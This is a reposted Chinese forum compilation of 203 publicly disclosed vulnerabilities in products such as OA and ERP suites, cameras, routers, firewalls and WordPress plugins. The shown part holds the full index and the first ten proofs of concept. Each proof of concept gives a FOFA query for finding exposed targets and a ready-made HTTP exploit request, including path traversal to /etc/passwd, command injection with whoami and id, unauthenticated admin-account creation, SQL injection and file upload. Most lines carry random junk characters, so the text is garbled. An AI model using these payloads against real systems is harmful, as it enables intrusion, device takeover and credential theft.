中国网络渗透测试联盟

标题: 互联网公开漏洞整理202309-202406--转载 [打印本页]
作者: admin    时间: 2024-6-5 14:31
标题: 互联网公开漏洞整理202309-202406--转载
互联网公开漏洞整理202309-202406
, ^, P4 E- q+ c9 v道一安全 2024-06-05 07:41 北京; _5 ~$ {' y6 W9 Q" S
以下文章来源于网络安全新视界 ,作者网络安全新视界* |& H$ t  @; i) ^

/ d0 b) R0 R) B+ M1 h" P% {7 B发文目的:Nday漏洞的利用是安全攻防占比较大的攻击方式,希望文章对大家的防守提供一定帮助。防守同学可根据本文内容进行风险排查。
% b* y2 q1 P1 w# f# M8 `4 C% d" c( k% Z
漏洞来源:文章涵盖2023年9月至2024年5月国内外公开的高危害漏洞POC共203个,均来自于互联网其他公众号或者网站,由网络安全新视界团队进行整理发布。; n" W, D  j( N( Z

6 W3 g& ?  a& I; G安全补丁:所有的漏洞均为公开漏洞,补丁或漏洞修复方案请联系产品厂家。
1 l. \2 ~% S$ l4 W. n" I+ s4 ]9 f0 h' h9 t2 {2 n
文章内容:因受篇幅限制,个别漏洞POC由于过长,统一使用PAYLOAD字样代替,如需完整POC请自行搜索。
9 j; h1 I! y% O. F$ l
- Q$ b/ n+ j1 u9 H% F合法权益:如文章内容侵犯某方合法权益,请后台联系网络安全新视界团队对相关内容进行删除。# C; v" J/ b/ k6 Z' K4 A# t  p

) X, f  c$ t# L
( \+ z$ o" ?6 z! d7 A' H声明
- L1 P/ Z+ Y3 w2 `  e, A) |8 f! {, O
% o- w( R/ Y/ ]5 q8 N# W- z4 e4 l: l& R为简化流程,方便大家翻阅,固不设置“回复再给完整列表”。本文章就是当前最全文章,使用时F12搜索关键词即可。
; P( H- z. F- ]: \$ C
* a8 }; {1 f: w有需要的可以收藏此文。也可以关注本公众号(网络安全新视界)。: ]3 _4 i3 [  Z7 A1 H2 S: D) x+ k
: Y2 Z& c! k! b$ o* [# R
/ e  b; p9 L( m" ?+ ?% M

, z8 ?  F0 S) P- D/ y目录" t5 p" k% I+ s" f# i

1 w! p6 z$ ~$ u+ t* C; G* T1 u01
" I4 |; ~5 w4 V. q; b6 j7 i: W! E: K; y9 i1 ^, V8 n' F
1. StarRocks MPP数据库未授权访问
" g: B# i+ Z6 }2. Casdoor系统static任意文件读取
5 A) Y# Q! C# A( A3. EasyCVR智能边缘网关 userlist 信息泄漏
8 p! l$ y# K1 j3 E0 l  p2 g4. EasyCVR视频管理平台存在任意用户添加! x  o+ P0 q/ _0 V( m
5. NUUO NVR 视频存储管理设备远程命令执行
! J& C/ t9 S2 y8 z6. 深信服 NGAF 任意文件读取
# v3 B; E( v# q' q' @& T7. 鸿运主动安全监控云平台任意文件下载( [& t( x4 {+ r
8. 斐讯 Phicomm 路由器RCE
# [2 `) `; V- X- m9. 稻壳CMS keyword 未授权SQL注入
/ {% r6 h. [# g8 R, K  ~" `10. 蓝凌EIS智慧协同平台api.aspx任意文件上传
2 J5 T- k1 y" n! i: S  q11. 蓝凌EIS智慧协同平台 doc_fileedit_word.aspx SQL注入1 J1 `, W0 ~9 H  T$ {
12. Jorani < 1.0.2 远程命令执行
; ~" ^: q( S& K# T5 W- y1 q* M! I13. 红帆iOffice ioFileDown任意文件读取5 `: ~, ~& w; L3 |- C% p
14. 华夏ERP(jshERP)敏感信息泄露) T" g  q1 B6 |) ~! ?0 Q$ L
15. 华夏ERP getAllList信息泄露
4 X8 g' B% j4 A; ]; v16. 红帆HFOffice医微云SQL注入
0 e3 P. E$ b, `. c7 O8 N3 k2 N17. 大华 DSS itcBulletin SQL 注入% a4 q0 {9 j; Q$ E
18. 大华 DSS 数字监控系统 user_edit.action 信息泄露, p/ g4 A: u. }% s
19. 大华 DSS 数字监控系统 attachment_clearTempFile.action SQL注入
: j+ w' w% r/ w8 w( l% T20. 大华ICC智能物联综合管理平台任意文件读取
$ G/ G6 k& o3 |6 E: Y21. 大华ICC智能物联综合管理平台random远程代码执行- m8 m  A. }3 N6 @
22. 大华ICC智能物联综合管理平台 log4j远程代码执行: r9 ^) A% k) Z; x$ O) `
23. 大华ICC智能物联综合管理平台 fastjson远程代码执行
# q# I* ?9 ?  n+ C24. 用友NC 6.5 accept.jsp任意文件上传
5 a7 l' p% `( h! K4 T+ K25. 用友NC registerServlet JNDI 远程代码执行
9 e3 h$ x- n' Y) O' n1 r3 w4 n26. 用友NC linkVoucher SQL注入- u' T: C2 T5 Z4 {/ m
27. 用友 NC showcontent SQL注入
7 z! {* D+ H1 W- s3 e28. 用友NC grouptemplet 任意文件上传
) H. n. \: d. }/ I% T29. 用友NC down/bill SQL注入$ ~: A, E1 p5 A
30. 用友NC importPml SQL注入1 V9 R( [9 ]9 ~
31. 用友NC runStateServlet SQL注入( {  U1 I) ?( t! Z5 t- o: S7 n
32. 用友NC complainbilldetail SQL注入4 _( ?6 l7 n2 i) p. N: A' Q
33. 用友NC downTax/download SQL注入$ f8 V" p! p9 B$ c3 b, P
34. 用友NC warningDetailInfo接口SQL注入
. \# ?) n# ]0 q. R35. 用友NC-Cloud importhttpscer任意文件上传
! c! n0 g' v5 A* v% _1 N" P36. 用友NC-Cloud soapFormat XXE1 r! q3 G$ r4 t/ a, y- D6 a* _
37. 用友NC-Cloud IUpdateService XXE' S7 K6 d# d9 Q- L- `5 p0 F$ v
38. 用友U8 Cloud smartweb2.RPC.d XXE
- e6 ]) P. k5 Q/ {' J, c39. 用友U8 Cloud RegisterServlet SQL注入
3 f% A- G6 C$ t9 D' S5 N0 \% i! `40. 用友U8-Cloud XChangeServlet XXE' k# H2 _6 h0 y, I2 N+ W
41. 用友U8 Cloud MeasureQueryByToolAction SQL注入4 A' w! d3 G% l! m: a5 Z( P
42. 用友GRP-U8 SmartUpload01 文件上传- B' g3 b1 G. f/ @( _4 u: W% p
43. 用友GRP-U8 userInfoWeb SQL注入致RCE: a, x% Q9 E7 Q5 @' C( S
44. 用友GRP-U8 bx_dj_check.jsp SQL注入
* x8 Q+ B+ [7 p45. 用友GRP-U8 ufgovbank XXE
  K7 }& k' Y" F" X# M$ l46. 用友GRP-U8 sqcxIndex.jsp SQL注入7 w. B- N6 ]7 N: g8 U5 l% f
47. 用友GRP A++Cloud 政府财务云 任意文件读取
/ [1 |( T. L+ ^" |( s- E/ ?1 X% B48. 用友U8 CRM swfupload 任意文件上传
) O5 @' z# T2 f3 r. d5 m49. 用友U8 CRM系统uploadfile.php接口任意文件上传
) y" `0 G5 C) L# _4 M) z& h; z50. QDocs Smart School 6.4.1 filterRecords SQL注入0 L) L; s4 c( x
51. 云时空社会化商业 ERP 系统 validateLoginName SQL 注入$ i/ h5 Z# }* Z* d1 q# L% q- ]6 T
52. 泛微E-Office json_common.php sql注入" \3 t, s4 I; R
53. 迪普 DPTech VPN Service 任意文件上传- a5 R, @/ }8 B
54. 畅捷通T+ getstorewarehousebystore 远程代码执行
8 F+ T6 B) W0 a$ H55. 畅捷通T+ getdecallusers信息泄露8 ^+ \. b% B( }: g" I* p# V/ V
56. 畅捷通T+ RRATableController,Ufida.T.DI.UIP.ashx 反序列化RCE- |9 v8 S  m7 S4 `
57. 畅捷通T+ keyEdit.aspx SQL注入
$ t6 I7 T: V1 D8 J58. 畅捷通T+ KeyInfoList.aspx sql注入5 T' A) `; _3 w) T6 K; L
59. XETUX 软件 dynamiccontent.properties.xhtml 远程代码执行7 k+ _+ K! R6 y8 R) S! E$ K
60. 百卓Smart管理平台 importexport.php SQL注入* R- v# X/ s7 b7 @" O" x$ H& p
61. 浙大恩特客户资源管理系统 fileupload 任意文件上传
# H5 }. Z' p  K: z4 J$ ?62. IP-guard WebServer 远程命令执行1 x6 p% b  F  J1 b% `
63. IP-guard WebServer任意文件读取: |* e- Z/ B0 z1 ?$ u' d& y
64. 捷诚管理信息系统CWSFinanceCommon SQL注入
3 r, x; _6 d: {% a4 Z65. 优卡特脸爱云一脸通智慧管理平台1.0.55.0.0.1权限绕过
3 l6 U% u) Y/ u" X( x0 K, \66. 万户ezOFFICE协同管理平台SendFileCheckTemplateEdit-SQL注入5 t9 S+ D1 k1 C& C& \" a+ G
67. 万户ezOFFICE wpsservlet任意文件上传
' J  |  s1 t7 V$ [68. 万户ezOFFICE wf_printnum.jsp SQL注入
. x0 z! j! ~2 t, X( n( o- R. M69. 万户 ezOFFICE contract_gd.jsp SQL注入
$ Q+ K( H3 e& t: l8 b$ Z$ N70. 万户ezEIP success 命令执行
# }. Y, O4 X: i71. 邦永PM2项目管理系统 Global_UserLogin.aspx SQL注入. ^# F9 Y% W4 U
72. 致远OA getAjaxDataServlet XXE5 k; h+ U% _3 [% b" U
73. GeoServer wms远程代码执行  t& p! ?9 r  Q0 v7 @9 M; U' Q
74. 致远M3-server 6_1sp1 反序列化RCE! d- Y" d4 w9 Y* S
75. Telesquare TLR-2005Ksh 路由器 admin.cgi RCE
; p: U* G: H0 ~/ t* y3 x/ _76. 新开普掌上校园服务管理平台service.action远程命令执行5 V5 e; y3 p; Q4 e7 I) I
77. F22服装管理软件系统UploadHandler.ashx任意文件上传6 L& u& C1 p/ @# U3 W* k. m
78. pkpmbs 建设工程质量监督系统 FileUpload.ashx 文件上传
. l) o% v/ N7 C$ w- b, _79. BYTEVALUE 百为流控路由器远程命令执行# \0 Q. A' j7 K4 j$ E5 h! x
80. 速达天耀软件DesignReportSave.jsp接口存在任意文件上传
+ }4 j& Y' H6 V% E; e3 Y4 L81. 宇视科技视频监控宇视(Uniview)main-cgi密码泄露5 t! e5 z# h3 O# U& y, o: `+ l2 l7 }
82. 思福迪LOGBASE运维安全管理系统 test_qrcode_b 远程命令执行7 G, @  t; l, D3 Z+ K4 m
83. JeecgBoot testConnection 远程命令执行" N% g5 M8 x  }) @: v6 M$ |
84. Jeecg-Boot JimuReport queryFieldBySql 模板注入. _2 j  {7 W# R2 X# |' ^) O
85. SysAid On-premise< 23.3.36远程代码执行
5 d. L( }( _% X& u) Q86. 日本tosei自助洗衣机RCE
. e6 X, R6 R6 l0 j! u6 y( _87. 安恒明御安全网关aaa_local_web_preview文件上传
" h( {, t! ?# N2 w+ ~0 R, @88. 安恒明御安全网关 aaa_portal_auth_config_reset 远程命令执行
' e- j1 K* s4 |0 ^9 R, l  y89. 致远互联FE协作办公平台editflow_manager存在sql注入
; T3 U1 l9 E# F- o90. 海康威视IP网络对讲广播系统3.0.3_20201113_RELEASE远程命令执行' h8 r- Q4 N5 e3 @
91. 海康威视综合安防管理平台orgManage/v1/orgs/download任意文件读取/ s, H& u4 z8 c9 A6 ?% D
92. 海康威视运行管理中心session命令执行, ?% Y. q0 k- P4 f! P
93. 奇安信网神SecGate3600防火墙app_av_import_save任意文件上传9 E5 U2 N; S! s4 _' H* }8 h
94. 奇安信网神SecGate3600防火墙obj_area_import_save任意文件上传
/ }: p' g0 R0 H  Z" f95. Apache-OFBiz < 18.12.10 xmlrpc远程代码执行1 u$ r" E$ Y2 a7 i# b4 R) a/ g
96. Apache OFBiz  18.12.11 groovy 远程代码执行
9 C5 j' E# {- _$ s. E3 f0 e97. OneBlog v2.2.2 博客Shiro反序列化远程命令执行2 n7 [; y0 @) d$ T/ o0 {
98. SpiderFlow爬虫平台远程命令执行5 Z; o" f; r2 [
99. Ncast盈可视高清智能录播系统busiFacade RCE- q6 }  I/ \) c) |! y$ r( _
100. Likeshop 2.5.7.20210311 File.php userFormImage 文件上传0 [9 f- u2 r4 ?$ F3 a
101. ivanti policy secure-22.6命令注入
9 n$ ]/ q" W: m/ F* \  f4 A102. Ivanti Pulse Connect Secure VPN SSRF致远程代码执行
! R$ L0 Z& E: C- E1 ~5 X; V8 E# ?9 w103. Ivanti Pulse Connect Secure VPN XXE
: T$ n/ f% G( o4 v  a104. Totolink T8 设置 cstecgi.cgi getSysStatusCfg 信息泄露
. m7 }9 Y  W8 w% ]8 e105. SpringBlade v3.2.0 export-user SQL 注入
; Q7 [  }$ F* d$ O) b106. SpringBlade dict-biz/list SQL 注入
" `/ t" J6 S! k: T4 k* r0 d107. SpringBlade tenant/list SQL 注入
) T. T: o) t& l: h3 I* o108. D-Tale 3.9.0 SSRF
. p5 L9 \0 E" z( G0 c109. Jenkins CLI 任意文件读取! \, h2 _+ Z) S6 Q- ]) [( h+ I
110. Goanywhere MFT 未授权创建管理员
6 w; Y  r, }% V. w- q( t111. WordPress Plugin HTML5 Video Player SQL注入
2 v! D2 ^. N4 t0 t- t112. WordPress Plugin NotificationX SQL 注入
6 P4 e% v4 }8 I; V113. WordPress Automatic 插件任意文件下载和SSRF7 k# e. A& b: v& p; h% @
114. WordPress MasterStudy LMS插件 SQL注入( ?* `. K% G, \; o: a5 i: c0 N
115. WordPress Bricks Builder <= 1.9.6 RCE. W" C! h& `: Y# a
116. wordpress js-support-ticket文件上传2 H! C4 ~0 N: I! Y& P1 t4 w, v
117. WordPress LayerSlider插件SQL注入
) ?4 q5 K" E  @* U+ t9 ?/ W* z118. 北京百绰智能S210管理平台uploadfile.php任意文件上传) C. s3 a0 a. _9 V
119. 北京百绰智能S20后台sysmanageajax.php sql注入
5 {/ P, w& Z* x* y5 r5 w7 i# P+ c120. 北京百绰智能S40管理平台导入web.php任意文件上传4 q8 U9 Z6 T9 K# M  n$ q
121. 北京百绰智能S42管理平台userattestation.php任意文件上传5 p1 h/ x1 l& I0 X  ^
122. 北京百绰智能s200管理平台/importexport.php sql注入1 P) V! A. k- ]) _7 X  B
123. Atlassian Confluence 模板注入代码执行
1 c: ]4 H  G& Z( ]124. 湖南建研工程质量检测系统任意文件上传
" S6 ~  L7 B1 u& j125. ConnectWise ScreenConnect身份验证绕过
1 ?8 i0 f! ^3 a7 W. W' h126. Aiohttp 路径遍历, g" g6 l4 y2 X" Y0 c
127. 广联达Linkworks DataExchange.ashx XXE$ P7 f1 _& h( Y
128. Adobe ColdFusion 反序列化
8 l- U" Q/ m1 K$ Y3 @3 N+ O' C/ E129. Adobe ColdFusion 任意文件读取$ {# @# G9 B+ u& I" m* l' @
130. Laykefu客服系统任意文件上传
' g, G  S/ D5 Z  L. M. J$ d131. Mini-Tmall <=20231017 SQL注入, w* h( c9 m- R! \
132. JetBrains TeamCity 2023.11.3 及以下版本存在身份验证绕过
, ?$ {' }' a% w% A' M* u3 b133. H5 云商城 file.php 文件上传
: M4 `( q2 x6 X5 o  k- a6 t: |134. 网康NS-ASG应用安全网关index.php sql注入
! @7 p, q) I4 o& H. [135. 网康NS-ASG应用安全网关list_ipAddressPolicy.php sql注入: W, h$ b1 C: g9 f/ A' G
136. NextChat cors SSRF
7 ^4 b! ]* c! r5 w5 E  I137. 福建科立迅通信指挥调度平台down_file.php sql注入
6 Q# P+ E5 `6 A1 }$ S+ h138. 福建科立讯通信指挥调度平台pwd_update.php sql注入
& |& O' d. Y7 w2 s: Y8 T139. 福建科立讯通信指挥调度平台editemedia.php sql注入( D! ?  h& O6 M& f( ^
140. 福建科立讯通信指挥调度平台get_extension_yl.php sql注入' O) L( ]2 A  a- j8 V
141. 建科立讯通信指挥调度管理平台 ajax_users.php SQL注入) Q; j7 b1 U3 {+ ?6 {& ]9 }5 C
142. CMSV6车辆监控平台系统中存在弱密码5 |$ V- Y- D2 d
143. Netis WF2780 v2.1.40144 远程命令执行
: c, j' ]( c5 s  k144. D-Link nas_sharing.cgi 命令注入# r& Q# r# x. V# ~$ O
145. Palo Alto Networks PAN-OS GlobalProtect 命令注入; U) r/ A4 K$ @" f
146. MajorDoMo thumb.php 未授权远程代码执行
# [% w5 ^0 |+ `7 d) ?* W147. RaidenMAILD邮件服务器v.4.9.4-路径遍历* {2 L/ R5 f7 ?' N7 p2 g# |  j! Q
148. CrushFTP 认证绕过模板注入5 u/ \7 N% G; H
149. AJ-Report开源数据大屏存在远程命令执行0 b9 G4 _& N0 l, C( v( }! l  a
150. AJ-Report 1.4.0 认证绕过与远程代码执行* N8 l! a( ~" v
151. AJ-Report 1.4.1 pageList sql注入; \! H  Z0 M* b8 y8 d
152. Progress Kemp LoadMaster 远程命令执行
+ j$ E8 I. P* j9 E153. gradio任意文件读取
- `+ E6 n: q, O5 T  j  ]7 E154. 天维尔消防救援作战调度平台 SQL注入
* D/ |3 ?+ X% t6 N( q" }4 O155. 六零导航页 file.php 任意文件上传! b1 ]( {% R. k
156. TBK DVR-4104/DVR-4216 操作系统命令注入
. h& e9 L3 B4 P' g6 ^- f$ y: o  g9 n157. 美特CRM upload.jsp 任意文件上传4 s' y+ E! {, t: g+ L8 f
158. Mura-CMS-processAsyncObject存在SQL注入
% t+ u( y! y8 Y  o) `2 ?, `159. 英飞达医学影像存档与通信系统 WebJobUpload 任意文件上传
6 S6 G6 [: x% I9 p6 \. B2 K2 i160. Sonatype Nexus Repository 3目录遍历与文件读取6 B1 }" m1 [# p3 |, c0 a+ I: {8 C
161. 科拓全智能停车收费系统 Webservice.asmx 任意文件上传
, D5 g0 F8 \# X" ^5 I4 ^  r162. 和丰多媒体信息发布系统 QH.aspx 任意文件上传
3 V4 V1 i  k+ T# l- s163. 号卡极团分销管理系统 ue_serve.php 任意文件上传
; f1 R) U8 e  u( h6 ]% _* ^164. 慧校园(安校易)管理系统 FileUpProductupdate.aspx 任意文件上传
% t5 b7 l' N! x0 C* R165. OrangeHRM 3.3.3 SQL 注入
% }0 z/ T! r: a$ ^* M% m0 F166. 中成科信票务管理平台SeatMapHandler SQL注入* i1 {0 x2 L4 R& L. Y" w/ h0 L  v6 v
167. 精益价值管理系统 DownLoad.aspx任意文件读取6 H! V) g/ S4 U4 {4 C* s; V* {7 t
168. 宏景EHR OutputCode 任意文件读取
* L4 H$ n6 Z1 l* O! h6 X169. 宏景EHR downlawbase SQL注入1 z6 Q' g& b, X3 ?4 \. K" ?# e9 j$ U
170. 宏景EHR DisplayExcelCustomReport 任意文件读取
+ C" h. O3 G" w' u, R  V171. 通天星CMSV6车载定位监控平台 SQL注入- K1 |8 j" t5 P) ~, b4 i
172. DT-高清车牌识别摄像机任意文件读取9 Y4 R" T! D4 S7 _  j0 Y* W
173. Check Point 安全网关任意文件读取
4 C4 }5 V1 c+ \& f2 t# H  A174. 金和OA C6 FileDownLoad.aspx 任意文件读取5 j; ]& v1 m# r3 y- m
175. 金和OA C6 IncentivePlanFulfill.aspx SQL注入
' @% y$ ?+ ^" J3 O% `176. 电信网关配置管理系统 rewrite.php 文件上传/ h2 R. c6 S" n6 }
177. H3C路由器敏感信息泄露  i. n! f9 E1 n5 o
178. H3C校园网自助服务系统-flexfileupload-任意文件上传  T1 B# r& L9 x# o
179. 建文工程管理系统存在任意文件读取0 I& T5 A% ]& t3 I& j
180. 帮管客 CRM jiliyu SQL注入, i2 |" s1 t$ z; [. B. f
181. 润申科技企业标准化管理系统 UpdataLogHandler.ashx SQL注入6 ^' k6 [2 {+ j4 g/ o# {# j- v$ b
182. 润申科技企业标准化管理系统AddNewsHandler.ashx 任意用户创建
; s5 }  r9 n( ?! X, A& }% M183. 广州图创图书馆集群管理系统 updOpuserPw SQL注入
: y- c% L% P/ q$ m( t184. 迅饶科技 X2Modbus 网关 AddUser 任意用户添加
* ~6 B' w8 D% g4 E185. 瑞友天翼应用虚拟化系统SQL注入
/ b6 E3 D8 R8 L+ O186. F-logic DataCube3 SQL注入- U0 }9 N$ e4 j# Q! J) ]
187. Mura CMS processAsyncObject SQL注入2 I) G' b8 e0 A" p6 D! a" s
188. 叁体-佳会视频会议 attachment 任意文件读取$ F5 \9 S. C: u2 m
189. 蓝网科技临床浏览系统 deleteStudy SQL注入3 s; W- H7 {. \/ R3 l- q1 g1 V
190. 短视频矩阵营销系统 poihuoqu 任意文件读取& K# W$ G2 _5 l
191. 亿赛通电子文档安全管理系统 NavigationAjax SQL注入1 E) `1 ^8 r4 K9 T- W) W6 S( d
192. 富通天下外贸ERP UploadEmailAttr 任意文件上传
# o, H( [# n" Z. ~6 h9 ~193. 山石网科云鉴安全管理系统 setsystemtimeaction 命令执行6 }+ T9 @5 }, z$ x5 I0 i
194. 飞企互联-FE企业运营管理平台 uploadAttachmentServlet 任意文件上传, a% ~2 r" @6 S; I0 A& B
195. 飞鱼星上网行为管理系统 send_order.cgi命令执行
* x1 a7 q' i8 C  _1 N, }- E196. 河南省风速科技统一认证平台密码重置# P# Q8 c  h' A
197. 浙大恩特客户资源管理系统-Quotegask_editAction存在SQL注入
7 n0 K+ m, t( W6 B198.  阿里云盘 WebDAV 命令注入$ F, v8 R. G# b/ w  g9 v
199. cockpit系统assetsmanager_upload接口 文件上传! ^4 ]- z% f" P
200. SeaCMS海洋影视管理系统dmku SQL注入4 r" u9 \; X+ q3 q: x4 v
201. 方正全媒体新闻采编系统 binary SQL注入2 v/ A& \! ]  |+ v4 |" J
202. 微擎系统 AccountEdit任意文件上传% |% {" C/ o, x/ B9 a$ W. o2 R
203. 红海云EHR PtFjk 文件上传' f# X* H* x$ N4 `4 l+ r( a: B

1 a( T, U& I9 y6 Z5 ^. vPOC列表
7 Q1 A2 Z2 A* |$ G
- W, o+ `/ V& a; G: u, y02  W# q/ F1 i9 H
; V. _9 R* z( |0 B8 X' ^. m
1. StarRocks MPP数据库未授权访问
. l+ j. J& D$ t' W# w3 T3 K: GFOFA :title="StarRocks"
, U% N% z6 U: f5 Y9 ~0 Q) nGET /mem_tracker HTTP/1.1- B/ y4 v' o* I/ Z" Q/ v8 ?, R6 U* A
Host: URL9 a4 W; O) h" F* M' ~. v
3 [; J) x) Q4 G- [% X0 W( ~% N5 B
0 R+ w1 a  d) @" s
2. Casdoor系统static任意文件读取& f* g5 f" N; A2 P, f9 w2 j- A
FOFA :title="Casdoor"
, E8 `, N2 ]+ jGET /static/../../../../../../../../../../../etc/passwd HTTP/1.1
5 U" ~& F! q- NHost: xx.xx.xx.xx:9999
& [/ [3 }; C" [. d# Z, \: c7 Q9 oUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
& H0 k; E! h2 U0 Y- R+ AConnection: close9 A; A& E6 P: N7 a8 N  j& j
Accept: */*' \; b  I$ j+ _( ]  h
Accept-Language: en8 R0 M5 v* S& B. @5 i& e
Accept-Encoding: gzip. ~( l4 y' x7 F

4 L1 N0 W6 e: m+ G/ }
+ p5 F9 F, {# h7 W4 U. O3. EasyCVR智能边缘网关 userlist 信息泄漏
" n4 V4 W+ D; q5 O. tFOFA :title="EasyCVR"
8 y* Z7 \5 y- N0 `. V5 WGET /api/v1/userlist?pageindex=0&pagesize=10 HTTP/1.12 P6 f$ p) O3 O2 f3 K- z- r
Host: xx.xx.xx.xx' t4 t4 B7 T# e2 h' @

3 g* E; N' r  B8 v) L! d5 e4 X  }$ |; G: e2 K" t
4. EasyCVR视频管理平台存在任意用户添加$ L: H$ x. d0 c- l, ?, s& @$ [1 Q5 u
FOFA :title="EasyCVR"
) K1 \! t$ p5 L6 v, B# H- V" U
5 v* Q2 M) }  f# W! Q/ S- xpassword更改为自己的密码md5
9 \# b9 o( ]" {& w8 R) p' N$ YPOST /api/v1/adduser HTTP/1.13 y, _, s4 I" I0 r0 F3 `' Q) m( ^/ o
Host: your-ip
( d- t- g  u- c6 {9 hContent-Type: application/x-www-form-urlencoded; charset=UTF-8; U9 O8 T; ?3 i% u$ |# X

' J0 |( }" p( f+ sname=admin888&username=admin888&password=0e7517141fb53f21ee439b355b5a1d0a&roleid=1" A1 ?4 T; v' ^3 a- l" X3 l  `* W

6 M" J) _" U" y( x* U+ o/ k* ^- j4 B" j* Q9 ?9 F
5. NUUO NVR 视频存储管理设备远程命令执行. n% q, s6 _* M. \0 `+ `
FOFA:title="Network Video Recorder Login"" N& _; g+ ?# P
GET /__debugging_center_utils___.php?log=;whoami HTTP/1.1
8 W; S. M" p" q$ E9 ]' mHost: xx.xx.xx.xx
; ]/ @8 V# C) j$ v  }  @
7 N( D; y- a2 r' r, e
: G$ u, D* P+ m1 a+ C6. 深信服 NGAF 任意文件读取6 J6 m- u- k2 P8 B
FOFA:title="SANGFOR | NGAF"
7 x. l8 C- X( k7 ?: ], h% GGET /svpn_html/loadfile.php?file=/etc/./passwd HTTP/1.15 Q4 a! }! T: g6 w5 d
Host:
9 n) q6 p* R9 P# x$ M+ f. k
/ D" T; |8 B/ l" T' {2 }+ g3 S$ n/ @8 o% C
7. 鸿运主动安全监控云平台任意文件下载
8 m% O" f' C3 g7 f/ F) U- i, XFOFA:body="./open/webApi.html"8 d* A" G, ]. E0 g
GET /808gps/MobileAction_downLoad.action?path=/WEB-INF/classes/config/jdbc.properties HTTP/1.1* o/ `1 P) }& H& k2 z
Host:4 T1 `# f6 Z% H5 d: {

' I% _- A5 R# H! E& n6 o
- O8 z( u2 o$ E$ W' G! N8. 斐讯 Phicomm 路由器RCE
4 v7 \5 T0 v3 s  Z% w: eFOFA:icon_hash="-1344736688"  _, C# T) R$ |; g, {, P( N
默认账号admin登录后台后,执行操作. e3 o' u9 j( c  D- l* `0 J
POST /cgi-bin/luci/;stok=bcd6ccd2fa5d212ce6431ca22f10b96d/admin/wifireboot HTTP/1.1
& x" \+ c. H" C! F" \& w+ ]Host: x.x.x.x
1 R7 W# s5 H4 n9 I4 G$ ACookie: sysauth=第一步登录获取的cookie3 h! R! {" [! W7 C9 I
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxbgjoytz9 z" Z* Z3 Q7 H7 o3 ]2 ]9 L1 x, B( S
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
5 {7 x' x/ U* ~/ T# V; u% P! N$ @
7 R) S' @( C5 V; y------WebKitFormBoundaryxbgjoytz
, o# t. \- M  R9 MContent-Disposition: form-data; name="wifiRebootEnablestatus"5 p2 l+ U0 @9 O- O
0 q8 {& K6 A: T, B8 l" [' p5 w
%s+ J% T7 b2 ?) X% G5 e9 ^
------WebKitFormBoundaryxbgjoytz9 S' N  m9 G# J% @: q! G" i4 z
Content-Disposition: form-data; name="wifiRebootrange"2 K& R4 I6 T+ T5 a. z( l

, F) C! A  f; o12:00; id;
# t8 b( Q4 j4 ]------WebKitFormBoundaryxbgjoytz
5 ^9 H8 k2 H: S+ R. J2 pContent-Disposition: form-data; name="wifiRebootendrange"
9 e, V7 ^. c; b  Z# l- d8 W6 M  a+ n' {
%s:
5 t& k1 D1 z2 R" m3 B------WebKitFormBoundaryxbgjoytz5 T9 V, O. x' v
Content-Disposition: form-data; name="cururl2"
! D- `; Y8 L2 a& |+ v1 q9 ]' f# H" ~9 ]% F
6 e5 x" q+ r$ {, a) w6 x, r% F$ B' A
------WebKitFormBoundaryxbgjoytz--
2 Q. [, ]" R8 [% l6 P9 M7 I2 U5 K7 e

, A' F; L# g! X4 I9. 稻壳CMS keyword 未授权SQL注入; B+ u5 S7 s* b. p8 m
FOFA:app="Doccms"% q2 _% }( {9 ?
GET /search/index.php?keyword=1%25%32%37%25%32%30%25%36%31%25%36%65%25%36%34%25%32%30%25%32%38%25%36%35%25%37%38%25%37%34%25%37%32%25%36%31%25%36%33%25%37%34%25%37%36%25%36%31%25%36%63%25%37%35%25%36%35%25%32%38%25%33%31%25%32%63%25%36%33%25%36%66%25%36%65%25%36%33%25%36%31%25%37%34%25%32%38%25%33%30%25%37%38%25%33%37%25%36%35%25%32%63%25%32%38%25%37%33%25%36%35%25%36%63%25%36%35%25%36%33%25%37%34%25%32%30%25%37%35%25%37%33%25%36%35%25%37%32%25%32%38%25%32%39%25%32%39%25%32%63%25%33%30%25%37%38%25%33%37%25%36%35%25%32%39%25%32%39%25%32%39%25%32%33 HTTP/1.1/ I( ?4 D: Z7 j2 B
Host: x.x.x.x
3 L! o! v7 R! R5 g
' C/ ^  s' d- Z8 n  c
" v  A4 E+ ?* l2 vpayload为下列语句的二次Url编码( f7 M0 F, C4 F4 \( w

* F" p  P# }7 c' and (extractvalue(1,concat(0x7e,(select user()),0x7e)))#
0 ^7 T+ I" {3 \0 ?' E$ l) |; V. J4 Q8 ?& y& F# Z
10. 蓝凌EIS智慧协同平台api.aspx任意文件上传' e* W  T( g: Y4 T8 p# q
FOFA:icon_hash="953405444"/ h" b6 ?- G1 F2 j7 g( }4 y% [+ N
* L1 X0 s3 E/ l6 g5 T7 O
文件上传后响应中包含上传文件的路径
7 |! A" D2 A( g: a  wPOST /eis/service/api.aspx?action=saveImg HTTP/1.1
7 F1 J" W* x2 d" x  B2 w$ `7 y) w  tHost: x.x.x.x:xx
. K6 w4 P/ J; _, d. M5 [User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36* h+ A; a# F5 |. E$ g, l6 x
Content-Length: 1972 A& t" m: @. D. U
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
7 N- ^1 h; n( z+ s3 V% }Accept-Encoding: gzip, deflate
  Q2 J' w! Q3 }: x% b/ A4 l) f( cAccept-Language: zh-CN,zh;q=0.9
, o' G! w/ f$ d2 f) d( d" C) _Connection: close
+ o9 _( \. D1 ~) M2 mContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryxdgaqmqu# Y; r" r2 o/ W% P( |. l3 ^  }& S  p

8 J& @1 ^" |3 X' @1 M% m------WebKitFormBoundaryxdgaqmqu9 o& X+ q- X" v6 u' u! C" z
Content-Disposition: form-data; name="file"filename="icfitnya.txt"' X+ y' e( _# u+ a' O' a( g
Content-Type: text/html1 r" _4 @* A+ {" a/ |
' P# r5 M* R% p( t1 y3 W1 M& U
jmnqjfdsupxgfidopeixbgsxbf
